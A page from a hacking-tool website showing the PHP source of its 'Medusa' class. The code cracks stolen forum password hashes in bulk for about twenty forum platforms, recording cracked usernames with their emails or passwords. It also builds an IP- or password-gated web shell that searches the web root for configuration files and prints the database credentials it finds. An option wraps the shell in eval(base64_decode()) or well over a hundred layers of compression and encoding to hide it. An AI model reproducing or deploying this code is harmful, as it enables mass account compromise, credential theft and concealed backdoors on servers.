random gallery image
random tutorial
preview

..one or more modules you must have seen the iframes used for realtime result display. In this tutorial I'm going to show you how to insert them into your module and how they..

read more

random vulnerability assesment
THC AntiEvil

Attempts to find suspicious and evil files or code

more about this module
more of this category
more modules

HackSuite File Library
File Library
Here you can find the latest files and structure of the THC HackSuite, note that if you have an earlier version of the suite it's not recommended to update files manually. Instead you should overwrite your existing HackSuite environment.
<?php
/*
Contains all functionality for Medusa.

Author: Remco Kouw
Site: http://www.hacksuite.com
Last Edit: 12-11-2014
*/

/* THC Medusa Class */
class THC{
    var 
$aWords "";
    var 
$aProperties "";
    var 
$aUserHash "";
    
/* main */
    
function THC(){
    }
    
/* safely load wordlist while preventing file injection vulnerabilities */
    
function LoadWordlist($sWordlist){
        
$sWordlist "../../Wordlists/".$this->ExploitFilter($sWordlist,0,1);
        if(
false===($aFileData = @file($sWordlist))){
            return(
false);
        }
        
$this->aWords $aFileData;
        return(
true);
    }
    
/* safely load properties from a configuration file while preventing file injection vulnerabilities */
    
function LoadProperties($sProduct){
        
$sProduct "../forums/".$this->ExploitFilter($sProduct,0,1);
        if(!
file_exists($sProduct)){
            return(
false);
        }
        include_once(
$sProduct);
        
$this->aProperties $_PROPERTIES;
        return(
true);
    }
    
/* execute universal load users query and stores them in var $aUserHash */
    
function LoadUsers(){
        
$rQuery = @mysql_query($this->aProperties['queryraw']['attack']);
        
// UNCOMMENT IF YOU WANT TO SAVE THE QUERY IN test.txt
        // $this->WriteF("test.txt",$this->aProperties['queryraw']['attack'],"w");
        
$this->aProperties['total'] = @mysql_num_rows($rQuery);
        
$this->aUserHash = array();
        if(
$this->aProperties['total']!=0){
            while(
false!==($aRow = @mysql_fetch_array($rQuery,MYSQL_ASSOC))){
                
$this->aUserHash[] = $aRow;
            }
        }
    }
    
/* black hat one user cracking */
    
function SetUser($aUser){
        
$this->aUserHash[] = $aUser;
    }
    
/* returns the email address of a user */
    
function GetEmail($sUser){
        
$rQuery = @mysql_query(str_replace("/user/",$sUser,$this->aProperties['queryraw']['getemail']));
        return(@
mysql_result($rQuery,0,'temail'));
    }
    
/* checks whether the encrypted password matches the hash from the database */
    
function UserLogin($sUser,$sPass,$sHash,$sSalt=""){
        
$sEncrypt "";
        
$sPass trim($sPass);
        switch(
$this->aProperties['name']){
            case
"SMF1":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"SMF2":
            
$sEncrypt = @sha1(strtolower($sUser).$sPass);
            break;
            case
"MyBB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"IPB":
            
$sEncrypt = @md5(md5($sSalt).md5($sPass));
            break;
            case
"vBulletin4":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin3":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"vBulletin5":
            
$sEncrypt = @md5(md5($sPass).$sSalt);
            break;
            case
"FluxBB":
            
$sEncrypt = @sha1($sPass);
            break;
            case
"phpBB":
            return(
phpbb_check_hash($sPass,$sHash) ? true false);
            break;
            case
"Drupal6":
            
$sEncrypt = @md5($sPass);
            break;
            case
"Drupal7":
            return(
user_check_password2($sPass,$sHash) ? true false);
            break;
            case
"Dolphin":
            
$sEncrypt sha1(md5($sPass).$sSalt);
            break;
            case
"Joomla3":
            return(
PassHashing($sPass,$sHash) ? true false);
            break;
            case
"Joomla2":
            return(
PassHashing2($sPass,$sHash) ? true false);
            break;
            case
"Wordpress":
            
$cWP = new PasswordHash();
            return(
$cWP->CheckPassword($sPass,$sHash) ? true false);
            case
"Vanilla":
            
$cVanilla = new Gdn_PasswordHash2();
            return(
$cVanilla->CheckPassword($sPass,$sHash,"vanilla") ? true false);            
            break;
            case
"AEF":
            
$sEncrypt md5($sSalt.$sPass);
            break;
            case
"MiniBB":
            
$sEncrypt md5($sPass);
            break;
            case
"Phorum":
            
$sEncrypt md5($sPass);
            break;
            case
"UseBB":
            
$sEncrypt md5($sPass);
            break;
            case
"phpFusion":
            
$sEncrypt hash_hmac("sha256",$sPass,$sSalt);
            break;
            case
"AVS":
            
$sEncrypt md5($sPass);
            break;
            case
"XMB":
            
$sEncrypt md5($sPass);
            break;
        }
        return(
$sEncrypt==$sHash true false);
    }
    
/* creates serialized data so you can keep track of the session's progress */
    
function CrackUsers($iType){
        
$iUsers count($this->aUserHash);
        if(
$iUsers!=0){
            
// if there are users to crack
            
$aData = array();
            
$aData['tstart'] = time();
            
$aData['total'] = $iUsers;
            
$aData['product'] = $this->aProperties['name'];
            
$aData['version'] = $this->aProperties['version'];
            
$aData['matches'] = 0;
            
$aData['start'] = date('d-m H:i',$aData['tstart']);
            
$aData['current'] = 0;
            
$aData['last_user'] = "";
            
$aData['users'] = array();
            
// create session identifier and filename to store the results into
            
$sFileSession substr(sha1(time().mt_rand(0,10000)),0,10);
            
$sResultsFile "results/".$sFileSession.".txt";
            
$aData['identifier'] = $sFileSession;
            
// create results file
            
$this->WriteF($sResultsFile,serialize($aData),"w");
            
// insert record into task file
            
$this->WriteF("tasks.php",$sFileSession."|".$aData['tstart']."|0\n","a");
            for(
$x=0;$x<$iUsers;$x++){
                
$aData['current']++;
                if(
is_int($aData['current']/10)){
                    
$this->WriteF($sResultsFile,serialize($aData),"w");
                }
                for(
$y=0;$y<count($this->aWords);$y++){
                    if(@
$this->UserLogin($this->aUserHash[$x]['crackuser'],trim($this->aWords[$y]),$this->aUserHash[$x]['crackpass'],(isset($this->aUserHash[$x]['crackhash']) ? $this->aUserHash[$x]['crackhash'] : ""))==true){
                        
// easy user password, store the email and username
                        
$aData['matches']++;
                        
$aData['last_user'] = $this->aUserHash[$x]['crackuser'];
                        if(
$iType==0){ 
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->GetEmail($aData['last_user']));
                        }
                        else{
                            
$aData['users'][] = array($this->aUserHash[$x]['crackuser'],$this->aWords[$y]);
                        }
                        
$this->WriteF($sResultsFile,serialize($aData),"w");
                        continue;
                    }
                }
            }
            
// finalize record in task file
            
$this->WriteF("tasks.php",str_replace($sFileSession."|".$aData['tstart']."|0",$sFileSession."|".$aData['tstart']."|1",file_get_contents("tasks.php")),"w");
            
// finalize record in data file
            
$this->WriteF($sResultsFile,serialize($aData),"w");

        }
    }
    
/* gets the result file for the scan and returns it as a json structure */
    
function CreateJSON($aData){
        
$aRecords = array();
        for(
$x=0;$x<count($aData);$x++){
            
// every iteration is a (running) task
            
$sData = @file_get_contents("results/".$aData[$x][0].".txt");
            if(
$sData!=false){
                
$aRecords[] = @unserialize($sData);
            }
        }
        return(
json_encode($aRecords));
    }
    
/* fetches all filenames from a directory */
    
function GetFilesByDirectory($sDir){
        if(!
$rHandle = @opendir($sDir)){
            return(
false);
        }
        
$aFileBuffer = array();
        while(
false!==($sFile = @readdir($rHandle))){
            
// buffer all files
            
if($sFile!="." && $sFile!=".."){
                if(!
is_dir($sDir."/".$sFile)){
                    
$aFileBuffer[] .= $sFile;
                }
            }
        }
        @
closedir($rHandle);
        return 
$aFileBuffer;
    }
    
/* fetches all php files from a directory and it's sub directories */
    
function GetPHPFiles($sDir){
        
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        
$aData = array();
        foreach(
$iterator as $path){
              if(!
$path->isDir()){
                 
$aData[] = ($path->__toString());
              }
        }
        return(
$aData);
    }
    
/* fetches all files that can be created for shell management */
    
function GetSystemFiles($sDir){
        
$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($sDir),RecursiveIteratorIterator::CHILD_FIRST);
        
$aData = array();
        foreach(
$iterator as $path){
            unset(
$_SYSTEM);
              if(!
$path->isDir()){
                
$sPath $path->__toString();
                include_once(
$sPath);
                if(isset(
$_SYSTEM)){
                     
$aData[] = $sPath;
                }
              }
        }
        return(
$aData);
    }
    
/* opens a (task) file and split every line into pieces */
    
function RawToArray($sFile,$sSeparate="|"){
        if(!
$aFileData = @file($sFile)){
            return(
false);
        }
        
$aDataBuffer = array();
        for(
$x=0;$x<count($aFileData);$x++){
            if(!
$aDataBuffer[$x] = @explode($sSeparate,$aFileData[$x])){
                if(
$aFileData[$x]==""){
                    continue;
                }
            }
        }
        return(
$aDataBuffer);
    }
    
/* used for preventing LFI exploits in file requests */
    
function ExploitFilter($sString,$bXSS=false,$bFI=false,$bSQL=false){
        if(
$bXSS==false && $bFI==false && $bSQL==false){
            return(
$sString);
        }
        if(!
is_string($sString)){
            return(
$sString);
        }
        if(
$bXSS){
            
$sString strip_tags($sString);
        }
        if(
$bFI){
            
$sString str_replace("../","",$sString);
            
$sString str_replace("./","",$sString);
            
$sString preg_replace('[^a-zA-Z0-9\-_\.\/ ]','',$sString);
        }
        if(
$bSQL){
            
$sString mysql_real_escape_string($sString);
        }
        return(
$sString);
    }
    
/* writes data to a file, overwrites it or creates a new file with the content in $sWrite */
    
function WriteF($sDest,$sWrite,$sMode="a"){
        if(
$sMode!="a" && $sMode!="w"){
            
$sMode "a";
        }
        if(!
$rNew = @fopen($sDest,$sMode)){
            return(
false);
        }
        @
fputs($rNew,$sWrite);
        @
fclose($rNew);
        return(
true);
    }
    
/* creates the database connection and selects the specified database */
    
function MySQLConnect($aCredentials){
        
$rConnect = @mysql_connect($aCredentials['host'],$aCredentials['username'],$aCredentials['password']);
        @
mysql_select_db($aCredentials['database']);
    }
    
/* creates a medusa shell */
    
function MedusaShell($aSystem,$aOptions){
        
$sShell "set_time_limit(0);\n";
        
$sTemplate "";
        if(isset(
$aOptions['ip'])){
            
// ip protection
            
$sShell .= "if(\$_SERVER['REMOTE_ADDR']!=\"".$aOptions['ip']."\"){\n";
            
$sShell .= "    header(\"Location: http://www.google.com\");\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        if(isset(
$aOptions['pass'])){
            
// password protection
            
$sShell .= "if(!isset(\$_POST['sPass']) || sha1(\$_POST['sPass'])!=\"".sha1($aOptions['pass'])."\"){\n";
            
$sShell .= "    echo'<html>\n";
            
$sShell .= "    <head></head>\n";
            
$sShell .= "    <body>\n";
            
$sShell .= "    <form method=\"post\">\n";
            
$sShell .= "    <input type=\"password\" name=\"sPass\" /> <input type=\"submit\" name=\"submit\" value=\"Submit\" />\n";
            
$sShell .= "    </form>\n";
            
$sShell .= "    </body>\n";
            
$sShell .= "    </html>';\n";
            
$sShell .= "    exit;\n";
            
$sShell .= "}\n";
        }
        
// create shell based on system array
        
$sShell .= "\$iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator(\$_SERVER['DOCUMENT_ROOT']),RecursiveIteratorIterator::CHILD_FIRST);\n";
        
$sShell .= "foreach(\$iterator as \$path){\n";
        
$sShell .= "    if(!\$path->isDir()){\n";
        
$sShell .= "        \$sPath = \$path->__toString();\n";
        
$sShell .= "        \$sFile = \"".$aSystem['file']."\";\n";
        
$sShell .= "        if(strtoupper(substr(PHP_OS,0,3))==='WIN'){\n";
        
$sShell .= "            \$sFile = str_replace(\"/\",\"\\\\\",\$sFile);\n";
        
$sShell .= "        }\n";
        
$sShell .= "        if(strpos(\$sPath,\$sFile)!==false){\n";
        
$sShell .= "            \$sData = file_get_contents(\$sPath);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['user'])."',\$sData,\$aUser);\n";
        
$sShell .= "            if(!isset(\$aUser[1])){\n";
        
$sShell .= "                continue;\n";
        
$sShell .= "            }\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['database'])."',\$sData,\$aDB);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['password'])."',\$sData,\$aPass);\n";
        
$sShell .= "            preg_match('".str_replace("'","\'",$aSystem['patterns']['host'])."',\$sData,\$aHost);\n";
        
$sShell .= "            \$sResult = \"<b>user:</b> \".\$aUser[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>pass:</b> \".\$aPass[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>host:</b> \".\$aHost[1].\"<br />\";\n";
        
$sShell .= "            \$sResult .= \"<b>database:</b> \".\$aDB[1].\"<br />\";\n";
        
$sShell .= "            die(\$sResult);\n";
        
$sShell .= "        }\n";
        
$sShell .= "    }\n";
        
$sShell .= "}\n";
        
$sShell .= "die(\"Failed to get login information.\");\n";
        if(isset(
$aOptions['encrypt'])){
            
// source protection
            
if($aOptions['encrypt']=="normal"){
                
$sShell "eval(base64_decode('".base64_encode($sShell)."'));\n";
            }
            else{
                
$sEncoder "\$sPull = \"leverage the inflatable base 4/16 and_or gza jump to tor strings code compressing unescaped\";\n";
                
$sEncoder .= "\$aPull = explode(\" \",\$sPull);\n";
                
$sEncoder .= "\$aF = array();\n";
                
$sEncoder .= "\$aF[] = \$sPull[1].\$sPull[2].\$sPull[5].\$sPull[0];\n";//eval
                
$sEncoder .= "\$aF[] = substr(\$sPull,57,3).\$sPull[4].\$aF[0][0].\$aF[0][1];\n";//strrev
                
$sEncoder .= "\$aF[] = substr(\$sPull,41,2).substr(\$sPull,13,6).\$aF[0][0];\n";//gzinflate
                
$sEncoder .= "\$aF[] = \$aF[2][0].\$aF[2][1].\$sPull[(strpos(\$sPull,\"_\")-1)].\$aF[0][0].substr(\$aF[2],4);\n";//gzdeflate
                
$sEncoder .= "\$aF[] = \$aPull[3].str_replace(\"1/\",\"\",\$aF[1](\$aPull[4])).\"_\".\$aF[0][0].\$aF[2][3].\$aPull[11];\n";//base64_encode
                
$sEncoder .= "\$aF[] = substr(\$aF[4],0,7).\$aF[3][2].\$aF[0][0].substr(\$aF[4],9);\n";//base64_decode
                
$sEncoder .= "\$aF[] = substr(\$aF[3],0,2).substr(\$aPull[13],0,2).substr(\$aPull[12],0,8);\n";//gzuncompress
                
$sEncoder .= "\$aF[] = str_replace(substr(\$aPull[13],0,2),\"\",\$aF[6]);\n";//gzcompress
                // encode and decode functions
                
$_ENCODE = array();
                
$_ENCODE[0] = array(7,"gzcompress");
                
$_ENCODE[1] = array(4,"base64_encode");
                
$_DECODE = array();
                
$_DECODE[0] = array(6,"gzuncompress");
                
$_DECODE[1] = array(5,"base64_decode");
                
// good luck decrypting the shell :p
                
$iEncryptions count($_ENCODE)-1;
                
$iEncryptionLoops mt_rand(120,150);
                for(
$x=0;$x<$iEncryptionLoops;$x++){
                    
$iEncryption mt_rand(0,$iEncryptions);
                    
$sShell "\$aF[".$_ENCODE[$iEncryption][0]."]('".$_ENCODE[$iEncryption][1]($sShell)."')";
                }
                
$sShell $sEncoder.$sShell.";";
            }
        }
        if(isset(
$aOptions['shellcreate'])){
            
// save source
            
return($this->WriteF($aOptions['shellcreate'],"<?php\n".$sShell."?>","w"));
        }
        else{
            
$sShell str_replace("\n","<br />\n",htmlspecialchars("<?php\n".$sShell)."?>");
            return(
$sShell);
        }
    }
}
?>
powered by
site stats
cms statistics:
version: 0.6.0
downloads: 3921
native: 26
modules: 21
apps: 2
support development
It takes lots of calories in order to create new things for the hacksuite, so it would be grand if you could buy me a protein shake or extra energy to keep me going. Thanks!
disclaimer
We are not responsible for any direct or indirect damage caused by abusing the tools provided on hacksuite.com. The suite is developed for educational purposes, use at your own risk!
Created by Remco Kouw. Powered by protein shakes and a high calorie diet.